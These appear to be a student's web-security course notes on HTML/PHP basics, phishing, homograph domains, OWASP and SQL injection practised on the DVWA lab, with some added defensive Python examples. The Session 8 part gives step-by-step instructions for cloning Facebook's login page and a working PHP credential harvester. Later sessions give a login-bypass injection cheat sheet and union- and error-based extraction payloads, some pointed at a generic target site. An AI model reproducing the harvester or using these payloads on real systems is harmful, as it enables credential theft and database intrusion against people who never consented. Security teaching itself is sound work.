- readable but not understandable<br>
- Decryption --> Reverse of encryption, conversion of Cipher text into a plain
- text<br>
- Algorithm --> It is the code which is used to encrypt and decrypt the plain
- text into cipher text and cipher text into plain text.<br>
- Key --> it is a special function, encryption and decryption is possible just
- due to this key. <br>
- </p>
- <!-- <img> is a void element: no closing </img> tag -->
- <img src="naruto.jpg" height="700">
- <form action="mera.html" method="GET">
- Username :<input type="text" id="uname"><br>
- Password :<input type="password" id="pass"><br>
- <input type="submit" id="but">
- </form>
- </body>
- </html>
- =========
- mera.html
- =========
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p>
- This is my second page</p>
- <iframe src="http://www.lucideus.com"></iframe><br>
- <!-- <img> is a void element: no closing </img> tag -->
- <img src="goku.jpg" height="500">
- </body>
- </html>
- PHP Basics
- ==========
- Server Side Scripting Language
- <?php
- xxxx
- xxxx
- xxxx
- xxxx
- ?>
- <?php ---> Start of PHP code
- ?> ---> End of php code
- echo "Hello Guys";   // every PHP statement ends with a semicolon
- $var --> var is name of variable
- $hack --> Hack is name of variable
- $ ---> used to declare a variable
- $_POST
- $_GET
- =========
- CALL.html
- =========
- <html>
- <head>
- <title>Calculator</title>
- </head>
- <body>
- <form action="calc.php" method="post">
- First Value : <input type="text" id="first" name="first"><br>
- Second Value : <input type="text" id="second" name="second"><br>
- <input type="radio" name="group1" id="add" value="add" checked>ADD<br>
- <input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
- <button type="submit" id="answer" value="answer">Calculate</button>
- </form>
- </body>
- </html>
- ========
- calc.php
- ========
- <html>
- <head>
- <title>Jawab</title>
- </head>
- <body>
- <p>
- The Answer is:
- <?php
- $first  = $_POST['first']  ?? '';
- $second = $_POST['second'] ?? '';
- $op     = $_POST['group1'] ?? '';
- // Reject anything that is not a number instead of letting PHP coerce arbitrary input
- if (!is_numeric($first) || !is_numeric($second))
- {
- echo "Both values must be numbers";
- }
- elseif ($op == 'add')
- {
- echo $first + $second;
- }
- elseif ($op == 'subtract')
- {
- echo $first - $second;
- }
- else
- {
- echo "Unknown operation";
- }
- ?>
- </p>
- </body>
- </html>
- don.html
- =========
- <html>
- <head>
- <title>Me Hu DON</title>
- </head>
- <body>
- <h1>Hackers</h1>
- <h2>Mr. Ravi Raman</h2>
- <p>I am a Naval Officer.<br>
- I am an executive Officer.<br>
- I am 35 years old.<br>
- I am communication specialist.<br>
- </p>
- <a href="https://en.wikipedia.org/wiki/Black_hat">
- <h3>Mr. Madhu</h3>
- </a>
- <h4>Mr. Hothi</h4>
- <img src="spidy.jpg" width="500">
- <h5>Mr. Devdas</h5>
- <iframe src="http://www.lucideus.com"></iframe><br><br><br><br><br><br><br><br>
- <form action="sec.php" method="POST">
- Username :<input type="text" id="user" name="users"><br><br>
- Password :<input type="password" id="pass" name="passes"><br><br>
- <input type="submit" value="Login">
- </form>
- </body>
- </html>
- sec.php
- =======
- <html>
- <head>
- <title>SuperHero</title>
- </head>
- <body>
- <h1>This Is My Fav. SuperHero</h1>
- <img src="shakti.jpg">
- <?php
- $username=$_POST['users'];
- $password=$_POST['passes'];
- if($username == "admin")
- {
- echo "Welcome to password protected area admin";
- if($password == "passes")   // == compares; a single = would assign "passes" to $password and always be true
- {
- echo "Welcome admin";
- }
- else
- {
- echo "Wrong password";
- }
- }
- else
- {
- echo "Wrong username";
- }
- ?>
- </body>
- </html>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 8
- =========
- Phishing
- --------
- It is a technique in which an attacker creates a fake page or a fake web site which looks completely authentic and genuine, but is not. He deploys it and gets people to enter their credentials.
- 1. Spear Phishing
- 2. Vector Phishing | Credential Harvester
- 1. Spear Phishing
- -----------------
- Targeting a single individual or a crowd of people having a common interest. Target specific.
- 2. Credential Harvester
- -----------------------
- It is not target specific. Any kind of person can come and enter their credentials; the attacker just collects the credentials of the crowd for his own purpose.
- Create Facebook's Phishing Page
- ===============================
- 1. Open Your Browser
- 2. Goto www.facebook.com
- 3. Right Click on the login page ---> view page source
- 4. Select all ---> copy
- 5. Open notepad and paste the whole code
- 6. Scroll to the very top of the code.
- 7. Ctrl+F ---> action=
- action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
- 8. In the action attribute, replace the URL
- https://www.facebook.com/login.php?login_attempt=1&lwv=110
- with fish.php
- fish.php
- ========
- <?php
- header ('Location: https://www.facebook.com');
- $handle = fopen("coffee.txt", "a");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fwrite($handle, "\r\n");
- fclose($handle);
- exit;
- ?>
- Understanding The Code
- ======================
- <?php ---> start of the php code
- header ('Location: https://www.facebook.com');
- when the work of the PHP code is done, redirect the user to https://www.facebook.com
- $handle = fopen("coffee.txt","a");
- $handle ---> Variable
- fopen --> to open a file
- It will open a file, coffee.txt
- When opening a file, a mode must be passed which says how the file should be opened. There are 3 major modes:
- 1. Read --> r
- This mode is used only for reading the content of the file.
- 2. Write --> w
- This mode is used to write content into the file.
- 1. If there is no file with the name we passed, it creates a new file with that name.
- 2. If a file with that name exists and has data inside, it deletes all the data and starts writing the new data from the beginning (overwrite).
- 3. Append --> a
- It is the same as write, but it never deletes data; it continues writing at the end of the same file.
- foreach($_POST as $variable => $value)
- It is a for loop in PHP. It says: as long as data keeps coming to me through the POST method, keep this loop running.
- $variable => $value
- Phone or email => abc.cyb@gmail.com
- fwrite($handle, $variable); --> 1
- fwrite($handle, "="); ---> 2
- fwrite($handle, $value); ---> 3
- fwrite($handle, "\r\n"); --->4
- fwrite --> to write data into the file
- fwrite($handle, $variable);
- $handle ---> specify the file in which we want to write
- $variable --> the data which is to be stored in the file
- Lines 1, 2 and 3 together write, for example:
- email or phone = the value entered by the user
- Line 4 ---> writes a new line, so the next entry starts from the beginning of the next line
- fclose($handle);
- It closes the open file ---> coffee.txt
- exit;
- Stops the execution of the code and redirects the user to the site specified in the header
- ?> --> close of php code
- IDN Homographic Attack
- ======================
- There are many languages in the world. Among those languages there are many characters which look similar to English characters.
- To the human eye those similar characters show no difference, but to a computer they are different, because their character codes (Unicode code points) differ.
- а, с, е, о, р, х and у --> Russian (Cyrillic)
- a, c, e, o, p, x and y --> English (Latin)
- deepika Padukone --> English
- dеерikа раdukоnе --> Cyrillic + English
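- Added example (not from the notes): a small Python check that separates the Latin spelling from the Cyrillic look-alike above, the same test a mail gateway or browser applies before showing a name. The script lookup uses the Unicode character names; the mixed sample is written with escapes so the Cyrillic letters are visible.

```python
# Added example (not from the notes): tell a Latin name apart from its Cyrillic look-alike.
import unicodedata

# Constructed samples. The mixed one uses escapes so the Cyrillic letters are visible
# (U+0430 а, U+0435 е, U+043E о, U+0440 р); on screen it reads "deepika padukone".
LATIN_NAME = "deepika padukone"
MIXED_NAME = "d\u0435\u0435\u0440ik\u0430 \u0440\u0430duk\u043En\u0435"

def script_of(ch: str) -> str:
    """Script of one letter ("LATIN", "CYRILLIC", ...), or "" for digits, spaces, punctuation."""
    if not ch.isalpha():
        return ""
    # unicodedata.name() returns e.g. "CYRILLIC SMALL LETTER A"; the first word names the script.
    return unicodedata.name(ch, "").split(" ")[0]

def scripts_used(text: str) -> set:
    """Set of scripts that occur among the letters of text."""
    return {s for s in (script_of(c) for c in text) if s}

def is_mixed_script(text: str) -> bool:
    """True when letters of more than one script are mixed in one name or label."""
    return len(scripts_used(text)) > 1

def confusable_positions(text: str, expected: str = "LATIN") -> list:
    """(index, code point) of every letter that is not in the expected script."""
    return [(i, f"U+{ord(c):04X}") for i, c in enumerate(text)
            if script_of(c) and script_of(c) != expected]

def to_punycode(label: str) -> str:
    """The ASCII form a browser sends on the wire for one host-name label (IDNA):
    a pure-ASCII label is unchanged, the look-alike becomes an xn-- string."""
    return label.encode("idna").decode("ascii")

if __name__ == "__main__":
    for name in (LATIN_NAME, MIXED_NAME):
        print(name, sorted(scripts_used(name)), confusable_positions(name))
    print(to_punycode(MIXED_NAME.split(" ")[0]))   # starts with xn--
```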
- Case Study - Must Read
- ======================
- https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
- Social Engineering
- ==================
- To bluff someone in order to take their sensitive data. It is hacking without coding: human mind hacking. An attacker can retrieve the data or can make others do his dirty work.
- Fake Mails
- ==========
- Sending ----> https://emkei.cz/
- https://getgophish.com/
- https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
- Receiving ----> www.temp-mail.org
- haveibeenpwned.com
- https://howsecureismypassword.net/
- Email Tracing and Tracking
- ==========================
- Email headers
- https://grabify.link/ --> Try it yourself
- http://www.fuglekos.com/ip-grabber/index.html
- http://whoreadme.com
- Email Encryption
- ================
- End-to-end encryption.
- encipher.it
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 9
- =========
- Introduction to Vulnerability Assessment and Penetration Testing
- ----------------------------------------------------------------
- VAPT --> Vulnerability Assessment and Penetration Testing
- V --> Vulnerability
- Loopholes, weak security, security misconfiguration: places from where an attacker can intrude and compromise your system.
- A --> Assessment
- To scan for the vulnerability.
- P --> Penetration
- To breach into the system using the above vulnerability; to hack into or compromise the system.
- T --> Testing
- To test the above vulnerability, generate the report and pass it down.
- VA --> Vulnerability Assessment
- To scan the web application and report the vulnerabilities
- PT --> Penetration Testing
- To breach into the system and report on those vulnerabilities.
- VAPT --> Vulnerability Assessment and Penetration Testing
- When we talk about web application VAPT
- ========================================
- OWASP
- =====
- Open Web Application Security Project
- -------------------------------------
- It is a non-profit charitable organisation which works towards the security of web applications. They gather information from all around the globe, through a CTF initiative.
- They openly challenge the whole hacking community to hack into the online system and capture the flag; in return they provide a bounty. They gather the logs of the attacks which are performed in the CTF.
- After gathering all the logs, they analyse them and categorise the attacks accordingly.
- They release a list of 10 attacks.
- OWASP TOP 10 --> top 10 attacks.
- 1. Injection
- 2. XSS --> Cross Site Scripting
- 3. CSRF --> Cross Site Request Forgery
- 4. IDOR --> Insecure Direct Object References
- 5. Sensitive Data Exposure
- 6. Missing Function Level Access Control
- 7. Broken Authentication and Session Management
- 8. Unvalidated Redirects and Forwards
- 9. Security Misconfigurations
- 10. Using Components with known Vulnerabilities
- OWASP 2013 --> Stable
- OWASP 2017 --> Data sufficient
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- https://cybermap.kaspersky.com/
- https://www.fireeye.com/cyber-map/threat-map.html
- DBMS
- ====
- DataBase Management System
- --------------------------
- Where, how and when which data is supposed to be stored: in which table, in which database, in which column.
- DBA --> Database Administrator
- The administrator of the database, who manages the whole environment's databases. A DBA needs complete knowledge of one programming language --> SQL
- SQL --> Structured Query Language.
- This is the programming language used by the DBA or any user to interact with the database.
- Source --> Delhi
- Destination --> Jalandhar
- Date --> 10/6/2018
- Class -> 2T
- Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES ('Prashant', 10000, 'Roshan Garden Najafgarh', 'M');
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- Update <table_name> SET <value to change> where <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on any login form and gain access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the values is false, then the answer will be false
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the values is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single quote ---> used to break the SQL query
- 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Coupons | Promo Code ---> 1'or'1'='1
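- Added example (not part of the notes): the login check above built by string concatenation, as in the sec.php demo, beside the parameterised form, both fed the 1'or'1'='1 input. Python with an in-memory SQLite table and one constructed admin row; the table and function names are my own.

```python
# Added example (not from the notes): why 1'or'1'='1 opens a concatenated query and not a
# parameterised one. Constructed in-memory database; names are hypothetical.
import sqlite3

PAYLOAD = "1'or'1'='1"   # the always-true input from the notes

def make_db() -> sqlite3.Connection:
    """One constructed user; the password is kept in plain text to mirror the sec.php demo."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'passes')")
    return con

def build_vulnerable_sql(username: str, password: str) -> str:
    """String concatenation, the pattern the notes attack: the user's quote closes the
    string and the rest of the input becomes part of the WHERE clause."""
    return ("SELECT user FROM users WHERE user='" + username +
            "' AND password='" + password + "'")

def login_vulnerable(con, username: str, password: str):
    """Returns the matched user name, or None. With PAYLOAD in both fields the WHERE
    clause ends in OR '1'='1', which is always true, so the first row (admin) comes back."""
    row = con.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None

def login_safe(con, username: str, password: str):
    """Parameterised query: values travel separately from the SQL text, so the quote in
    1'or'1'='1 is compared as data and the WHERE clause is never altered."""
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable:", login_vulnerable(con, PAYLOAD, PAYLOAD))   # admin
    print("safe:", login_safe(con, PAYLOAD, PAYLOAD))               # None
```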
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- LVS setup
- =========
- Lucideus Vulnerable Simulator
- =============================
- DVWA --> Damn Vulnerable Web Application
- ----------------------------------------
- Open Source
- LVS_1.zip
- 1. Copy the zip file
- 2. Paste it in C:\xampp\htdocs
- 3. Extract the zip file
- LVS_1
- 4. Start the xampp server
- Apache
- MySQL
- 5. Start the browser
- 127.0.0.1/lvs_1
- 6. Click on the link --> lvs111
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 10
- ==========
- Insecure Direct Object References
- ---------------------------------
- A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
- www.bank.com/aofn/akjf.php?id=12 ---> Account1
- www.bank.com/aofn/akjf.php?id=11 ---> Account2
- www.bank.com/aofn/akjf.php?id=10 ---> Account3
- If I change the id value to another ID value and can access another account, it is considered an Insecure Direct Object Reference
- http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
- User ID = 1
- Username = Admin
- Password= password
- If I change the value of .php?Id=1 to .php?Id=2, then I can access another account, the one whose ID is 2
- Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
- Oyorooms.com/afogn/adifn.php?ID=admin.php
- id = 1 ---> 1 represents a token (a key) pointing at a record which contains --> username, password and other information.
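- Added example (not from the notes): the myaccount.php?Id=N lookup with the access control check the notes say is missing, in Python. The accounts table, user names and status codes are constructed.

```python
# Added example (not from the notes): the direct Id= lookup beside the checked version.
from urllib.parse import parse_qs

# Constructed table standing in for the accounts: Id 1 belongs to admin, Id 2 to gordonb.
ACCOUNTS = {
    1: {"owner": "admin",   "balance": 5000},
    2: {"owner": "gordonb", "balance": 120},
}

class Forbidden(Exception):
    """The logged-in user does not own the requested object."""

def account_insecure(requested_id: int) -> dict:
    """Insecure direct object reference: whatever Id= the URL carries is returned as-is."""
    return ACCOUNTS[requested_id]

def account_checked(session_user: str, requested_id: int) -> dict:
    """Same lookup plus the missing access control check: the object's owner must be
    the user from the server-side session, never a value taken from the request."""
    account = ACCOUNTS.get(requested_id)
    if account is None or account["owner"] != session_user:
        # One answer for "no such Id" and "not your Id", so Ids cannot be enumerated.
        raise Forbidden(f"{session_user} may not read account {requested_id}")
    return account

def accounts_for(session_user: str) -> list:
    """Stronger option: derive the objects from the session and drop the Id parameter."""
    return [i for i, a in ACCOUNTS.items() if a["owner"] == session_user]

def handle_myaccount(session_user: str, query_string: str) -> tuple:
    """Parse ?Id=N the way the notes' URL carries it and apply the check; (status, body)."""
    params = parse_qs(query_string)
    try:
        requested_id = int(params.get("Id", [""])[0])
    except ValueError:
        return 400, {}
    try:
        return 200, account_checked(session_user, requested_id)
    except Forbidden:
        return 403, {}

if __name__ == "__main__":
    # gordonb tampers Id=2 into Id=1, as the notes describe
    print(account_insecure(1))                   # leaks admin's account
    print(handle_myaccount("gordonb", "Id=1"))   # (403, {})
    print(handle_myaccount("gordonb", "Id=2"))   # (200, {...})
```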
- Get Parameter
- -------------
- php?Id=1 -->
- Something = something
- Sensitive Data Exposure
- =======================
- Personal Data
- Credential Data
- Banking Data
- Economical Data
- Financial Data
- 1. When data is transmitted in the URL, that is, your credentials are transmitted via a GET parameter.
- username=user&password=pass&submit=submit
- 2. When data is stored in plain text form rather than in hashed or encrypted form.
- 3. When data is stored in a text file rather than in the database.
- Id   Interest    Gender   Username   Password
- ---------------------------------------------
- 1    Badminton   Female   admin      Pa$$woRd
- 2    Football    Male     admin2     paSSwOrd
- Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.
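- Added example (not from the notes): storing the Password column of the table above as a salted slow hash instead of plain text, using only Python's standard library. The "pbkdf2$salt$hash" storage format and the function names are my own choice; the rows are the notes' sample.

```python
# Added example (not from the notes): replace the plain-text Password column with a
# salted, slow hash, and contrast it with the unsalted MD5 that DVWA stores.
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000   # slows down offline guessing; raise as hardware allows

# The notes' sample table, with passwords in plain text (the exposure being fixed).
USERS_PLAINTEXT = [
    {"id": 1, "username": "admin",  "password": "Pa$$woRd"},
    {"id": 2, "username": "admin2", "password": "paSSwOrd"},
]

def hash_password(password: str, salt: bytes = None) -> str:
    """Salted, slow hash. A fresh random salt per user means equal passwords give
    different stored values; in the DVWA user dump later in the notes, admin and
    smithy share one MD5 value because there is no salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2$" + base64.b64encode(salt).decode() + "$" + base64.b64encode(digest).decode()

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algo, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2":
        return False
    salt = base64.b64decode(salt_b64)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))

def hashed_table(rows: list) -> list:
    """What the table looks like once the plain-text column is replaced."""
    return [{"id": r["id"], "username": r["username"], "password": hash_password(r["password"])}
            for r in rows]

def unsalted_md5(password: str) -> str:
    """For contrast: the fast, unsalted MD5 that DVWA stores. Every user with the same
    password gets the same value, and common words are recognised at a glance."""
    return hashlib.md5(password.encode()).hexdigest()

if __name__ == "__main__":
    for row in hashed_table(USERS_PLAINTEXT):
        print(row)
    print(unsalted_md5("password"))   # 5f4dcc3b5aa765d61d8327deb882cf99, as in the DVWA dump
```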
- DVWA
- ====
- Damn Vulnerable Web Application
- -------------------------------
- It is a web application which is vulnerable by default. It is used for testing your skills and practising the web application attacks listed by OWASP.
- Could not connect to the database - please check the config file.
- 1. Goto c:\xampp\htdocs\dvwa\dvwa-1.0.8
- 2. Open the config folder
- 3. config.inc.php
- 4. $_DVWA = array();
- $_DVWA[ 'db_server' ] = 'localhost';
- $_DVWA[ 'db_database' ] = 'dvwa';
- $_DVWA[ 'db_user' ] = 'root';
- $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- $_DVWA[ 'db_password' ] = '';
- save the file
- Username:admin
- password:password
- SQL Injections
- ==============
- Where an attacker passes malicious SQL commands just to gain the juicy information from the database.
- SQLi
- UNION BASED SQL INJECTION
- =========================
- Where an attacker uses the UNION command to collect information and merge it into one result table. He passes malicious commands and queries to the database to do so.
- DEMO
- ====
- DVWA ---> Security:Low
- SQL Injection
- Step 1
- ======
- To find a 'GET' parameter.
- something=something
- php?id=something
- php?id=cat
- php?id=1
- php?id=query
- Either you click on some link of the web application|site, or enter something in the search box.
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 2
- ======
- To generate a SQL error, i.e. to break the query.
- 1
- 1'
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
- You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
- 'select * from table where id=1'   ---> the normal query
- 'select * from table where id=1' ' ---> the injected quote leaves a dangling quote, so the syntax breaks
- Step 3
- ======
- To count the number of columns the web application's query selects.
- For counting the number of columns, I will use order by
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 1
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
- Gives me error
- Unknown column '3' in 'order clause'
- This query means that I am asking the database to arrange the data according to column number 3
- But there is no column number 3 --> so it will generate an error
- order by n--+
- n starts from 1 and stops when I receive an error for the value of n
- --+ ---> To comment out
- If there is any data passed after --+, it will not execute at all.
- So there are 2 columns in the query.
- Step 4
- ======
- To merge the data of all the columns using the UNION command.
- union select 1,2,...,n-1--+
- n=3
- union select 1,2--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- ID: 1' union select 1,2--
- First name: admin
- Surname: admin
- ID: 1' union select 1,2--
- First name: 1
- Surname: 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- database() --> database name
- version() --> Database Version Number
- ID: 1' union select database(),version()--
- First name: admin
- Surname: admin
- ID: 1' union select database(),version()--
- First name: dvwa
- Surname: 10.1.25-MariaDB
- Step 5
- ======
- To call the mother of the database --> information_schema, to get the information about the table names
- information_schema --> it is a meta database --> it contains the names of the tables and columns which are present in the database.
- information_schema.tables
- |-> It stores the names of all the tables in the database.
- union select table_name,2 from information_schema.tables--+
- or
- union select 1,table_name from information_schema.tables--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Step 6
- ======
- I will again call the mother of the database, this time for the column names in the table named users
- information_schema
- information_schema.columns
- union select 1,column_name from information_schema.columns where table_name="users"--+
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: admin
- Surname: admin
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user_id
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: first_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: last_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: password
- column name --> user_id
- first_name
- Last_name
- user
- password
- Step 7
- ======
- To retrieve data using the above information.
- DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
- union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
- 1
- admin
- admin
- admin
- 5f4dcc3b5aa765d61d8327deb882cf99
- 2
- Gordon
- Brown
- gordonb
- e99a18c428cb38d5f260853678922e03 --> abc123
- 3
- Hack
- Me
- 1337
- 8d3533d75ae2c3966d7e0d4fcc69216b --> charley
- 4
- Pablo
- Picasso
- pablo
- 0d107d09f5bbe40cade3de5c71e9e9b7
- 5
- Bob
- Smith
- smithy
- 5f4dcc3b5aa765d61d8327deb882cf99
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 11
- ==========
- ERROR BASED SQL INJECTION
- =========================
- Error based SQL injection is a type of SQL injection technique that makes the error message show data in the form of database errors, instead of the SQL syntax error used in union based; it is for when we have a blind vulnerability that shows errors, so we can extract sensitive data from the database directly.
- Errors are very useful during the development of a web application, but they should be disabled on a live website, because errors always show internal sensitive data of the database.
- Error based SQL injection works on the ASP technology (asp.net, aspx), an open source server side web application framework developed by Microsoft, using the Microsoft MSSQL Server.
- TRUE CONDITION :
- ---------------
- Here 1 is True and 0 is False.
- AND GATE REPRESENTATION
- A | B | Resultant
- --+---+----------
- 0 | 0 | 0
- 0 | 1 | 0
- 1 | 0 | 0
- 1 | 1 | 1
- Checking the last true condition, it states:
- 1 & 1 = 1 i.e. 1*1=1 or True*True = True
- MAKING THIS TRUE CONDITION FALSE
- 1 & 0 = 0 i.e. 1*0=0 or True*False = False
- Error based SQL injection works by generating an error condition in the SQL syntax, so that the database replies with the error along with the sensitive data.
- DEMONSTRATION
- ===============
- Normally a SQL query can go like:
- ?id=10 | ?id=10 and 1=1 ; //TRUE
- Which means the condition is true and it will return the genuine website.
- - So, we can create an error in the SQL command by:
- ?id=10 and 1=0; //FALSE
- Which will make the database return its errors.
- CONDITIONS OF ERROR BASED SQLI
- ===============================
- = Only one query can execute at a particular time, unlike finding out the table names etc. as we do in union based.
- = It works on the basis of Last In First Out (LIFO).
- = Only the top table of the database can be accessed at one particular time. The same goes for columns and then for rows.
- ----
- First, the same as in union based SQLi, we start by finding the number of columns and the vulnerable column. Suppose the vulnerable column is 10.
- After creating an error, we start executing the command and extracting the data from the first table of the database.
- For selecting the top (first) table (because we cannot directly go to an "n"th column),
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables
- This will extract and give the data of the first table of the database, including its name and other entities. If the data is juicy then extract it, else we go for the next tables and columns.
- ----
- For deselecting the top/current table and selecting/extracting the next table,
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in ("Name of the previous tables")
- Here we are selecting the next top table excluding the previous one, and then extracting its data through the database errors. For example, if the first top table is named "Images", the query will be:
- ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in ("images", "guestbook")
- ----
- After getting through our juicy table, we go for the data situated in its columns.
- = ?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in ("images")
- Here we get the extracted data of the columns which are not of the table named Images.
- DEMO
- ====
- http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+
- http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
- We will get the version printed on the web page
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Here is our query to get the database name.
